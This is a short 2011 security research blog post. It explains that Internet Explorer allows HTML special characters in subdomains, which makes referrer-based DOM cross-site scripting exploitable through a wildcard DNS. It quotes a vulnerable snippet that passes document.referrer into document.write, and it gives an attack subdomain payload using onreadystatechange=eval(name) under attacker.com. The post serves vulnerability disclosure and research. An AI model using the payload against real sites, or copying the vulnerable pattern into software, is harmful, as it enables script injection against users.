Monday, March 28, 2011

Abusing Referrer on Explorer for Referrer based DOM Xss

I don't really know if this is actually known, but I thought it was worth writing.

In a few words
:
While other browsers do not allow particular charaters in sub domains, IE does. Hence it's possible to abuse that behavior to exploit referrer based DOM Xss.

Some more words about it:
I was doing some testing using DOMInator (a yet-to-release tool for finding DOM Based Xss) and I saw a JavaScript snippet doing the following:

with(document)
write('<sc'+"ript src="http://Host/image.gif?t="+c+"r="+(referrer.split("/")[2])+"></sc"+'ript>'); //updated to match host only referrer

Immediately some question came to me: « Is it actually exploitable? Do any browser allow HTML special characters in subdomain, like '">heyThere.mindedsecurity.com? »
After testing some browser I saw that Internet Explorer does allow them.

So we set up a DNS which always returns the same IP no matter what subdomain is requested.

That means that it's possible for an attacker to request
"onreadystatechange=eval(name).attacker.com and use it to abuse IE host behavior and exploit
pages vulnerable to DOM Based Cross Site Scripting via referrer.

Nota Bene: At the moment the wildcard DNS is private. But we'll release
a basic service to test referrer based DOMXss. So, stay tuned for updates.